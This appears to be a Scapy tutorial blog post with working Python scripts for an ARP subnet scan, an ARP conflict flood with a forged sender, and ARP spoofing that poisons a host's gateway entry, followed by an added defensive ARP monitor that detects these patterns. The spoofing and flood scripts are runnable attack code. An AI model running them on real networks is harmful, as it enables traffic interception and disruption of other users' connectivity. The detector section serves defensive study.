Small applications written with Scapy (1)

A few days ago I was learning Scapy, a powerful and well-known packet crafting tool. It ships in BT5 and is easy to install; it is an interactive tool built on Python. It supports a wide range of protocols, but not higher-layer ones such as HTTP, and it is not very efficient, so it is only suited to fairly simple small tools.

#!/usr/bin/env python3
"""
 LAN Mac Scan
 date 2013.4.22
"""
import sys, os
from scapy.all import *

if os.geteuid() != 0:
    print("This program must be run as root. Aborting.")
    sys.exit(1)
if len(sys.argv) < 2:
    print("Please use %s x.x.x" % sys.argv[0])
    sys.exit(1)
conf.verb = 0
ipscan = sys.argv[1] + ".0/24"   # first three octets are given on the command line
# Broadcast one ARP who-has per address in the /24 and collect the replies
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=ipscan), timeout=2)
with open("Mac_list.txt", "w") as f:
    for snd, rcv in ans:
        print(rcv)
        list_mac = rcv.sprintf("%Ether.src% -> %ARP.psrc%")
        print(list_mac)
        f.write(list_mac + "\n")

The above is a LAN scanning tool that sweeps the whole local network and records which hosts answer.

#!/usr/bin/env python3
"""
ARP attack
"""
import sys, os
from scapy.all import *

if os.geteuid() != 0:
    print("This program must be run as root. Aborting.")
    sys.exit(1)

if len(sys.argv) < 2:
    print("Please use %s x.x.x" % sys.argv[0])
    sys.exit(1)
attackIP = sys.argv[1] + ".0/24"
# Keep broadcasting ARP requests for every address in the /24 with a forged sender IP and MAC
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.100.1", hwsrc="00:66:66:66:66:66"), timeout=2)

This asks the LAN for the MAC of every IP address in the subnet. On Ethernet this is exactly how a host checks whether an IP address is already in use, so this code claims all the IPs and makes other machines report an IP address conflict error!

#!/usr/bin/env python3
"""
 ARP reply
"""
from scapy.all import *

AttackIP = input("Please input the IP of the gateway: ")
AttackIP_PC = input("Please input the IP of the PC: ")
# Keep sending unsolicited "is-at" replies to the PC, claiming the gateway IP is at a forged MAC
srploop(Ether(dst="00:0C:29:4B:B2:8C")/ARP(op="is-at",
        pdst=AttackIP_PC, hwdst="00:0C:29:4B:B2:8C", psrc=AttackIP, hwsrc="04:54:53:05:41:44"))

An ARP spoof: it targets one specific host (IP 192.168.100.9, MAC 00:0C:29:4B:B2:8C) and tells it that the gateway IP (AttackIP) is at MAC "04:54:53:05:41:44"; you can of course set this MAC to anything you like!
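All three scripts rely on the same property: ARP carries an unauthenticated claim that "IP x is at MAC y", and Scapy lets psrc/hwsrc be set freely while Ether.src still defaults to the real NIC address. As an added example (not code from the original post), here is a small offline ARP monitor in plain Python that decodes Ethernet/ARP frames without Scapy and flags the three things a defender can look for in the traffic these scripts produce: an ARP sender hardware address that does not match the Ethernet source, a known IP-to-MAC mapping changing (the spoofed gateway reply), and one station sending who-has requests for many target addresses (the subnet scan and the conflict flood). The gateway MAC 00:11:22:33:44:55, the attacker NIC aa:bb:cc:dd:ee:01 and the frames replayed by demo() are constructed test values; the IPs and forged MACs mirror the scripts above.

```python
import struct
from collections import defaultdict

ETH = struct.Struct("!6s6sH")            # dst MAC, src MAC, ethertype
ARP = struct.Struct("!HHBBH6s4s6s4s")    # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_str(b):
    return ":".join("%02x" % x for x in b)


def ip_to_str(b):
    return ".".join(str(x) for x in b)


def mac_to_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_to_bytes(s):
    return bytes(int(x) for x in s.split("."))


def parse_arp(frame):
    """Decode an Ethernet II + ARP frame; None for anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH.size + ARP.size:
        return None
    dst, src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac_to_str(src), "eth_dst": mac_to_str(dst), "op": op,
            "sha": mac_to_str(sha), "spa": ip_to_str(spa),
            "tha": mac_to_str(tha), "tpa": ip_to_str(tpa)}


def build_arp(op, sha, spa, tha, tpa, eth_src=None, eth_dst=BROADCAST):
    """Assemble a frame for the constructed test traffic below (inverse of parse_arp)."""
    eth = ETH.pack(mac_to_bytes(eth_dst), mac_to_bytes(eth_src or sha), ETHERTYPE_ARP)
    arp = ARP.pack(1, 0x0800, 6, 4, op, mac_to_bytes(sha), ip_to_bytes(spa),
                   mac_to_bytes(tha), ip_to_bytes(tpa))
    return eth + arp


class ArpMonitor:
    """Stateful checks over a stream of frames. Alerts are (rule, detail) tuples."""

    def __init__(self, sweep_threshold=16):
        self.ip_to_mac = {}                      # learned sender IP -> sender MAC
        self.targets_by_src = defaultdict(set)   # requesting MAC -> distinct target IPs
        self.sweep_threshold = sweep_threshold
        self.alerts = []

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return []
        new = []
        # Rule 1: ARP sender hardware address differs from the Ethernet source. Scapy fills
        # Ether.src with the real NIC address unless told otherwise, so a forged hwsrc shows
        # up as exactly this mismatch.
        if a["sha"] != a["eth_src"]:
            new.append(("hwsrc-mismatch", "%s carried in frame from %s" % (a["sha"], a["eth_src"])))
        # Rule 2: an IP we already know now arrives with a different MAC (cache poisoning).
        known = self.ip_to_mac.get(a["spa"])
        if known is not None and known != a["sha"]:
            new.append(("mapping-change", "%s moved from %s to %s" % (a["spa"], known, a["sha"])))
        else:
            self.ip_to_mac[a["spa"]] = a["sha"]
        # Rule 3: one station asking who-has for many distinct targets (subnet sweep).
        if a["op"] == OP_REQUEST:
            seen = self.targets_by_src[a["eth_src"]]
            seen.add(a["tpa"])
            if len(seen) == self.sweep_threshold:
                new.append(("arp-sweep", "%s probed %d addresses" % (a["eth_src"], len(seen))))
        self.alerts.extend(new)
        return new


def demo():
    """Replay constructed frames: a normal exchange, then the two attack patterns."""
    mon = ArpMonitor(sweep_threshold=16)
    gw, gw_mac = "192.168.100.1", "00:11:22:33:44:55"       # constructed gateway identity
    host, host_mac = "192.168.100.9", "00:0c:29:4b:b2:8c"   # the host from the post
    attacker_nic = "aa:bb:cc:dd:ee:01"                       # constructed attacker NIC
    # Legitimate: host asks for the gateway, gateway answers.
    mon.observe(build_arp(OP_REQUEST, host_mac, host, "00:00:00:00:00:00", gw))
    mon.observe(build_arp(OP_REPLY, gw_mac, gw, host_mac, host, eth_dst=host_mac))
    # Spoofed reply: "gateway is-at 04:54:53:05:41:44" sent to the host from the attacker NIC.
    mon.observe(build_arp(OP_REPLY, "04:54:53:05:41:44", gw, host_mac, host,
                          eth_src=attacker_nic, eth_dst=host_mac))
    # Sweep with a forged sender, one who-has per address (30 addresses here).
    for i in range(1, 31):
        mon.observe(build_arp(OP_REQUEST, "00:66:66:66:66:66", gw, "00:00:00:00:00:00",
                              "192.168.100.%d" % i, eth_src=attacker_nic))
    return mon.alerts


if __name__ == "__main__":
    for rule, detail in demo():
        print(rule, detail)
```

In real use the frames would come from a pcap or a raw socket. The monitor learns the first mapping it sees, so for the gateway a static expected MAC is the better reference, and every forged frame produces its own alert (the replay yields one hwsrc-mismatch and one mapping-change per spoofed frame plus a single arp-sweep), which a production monitor would rate-limit.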
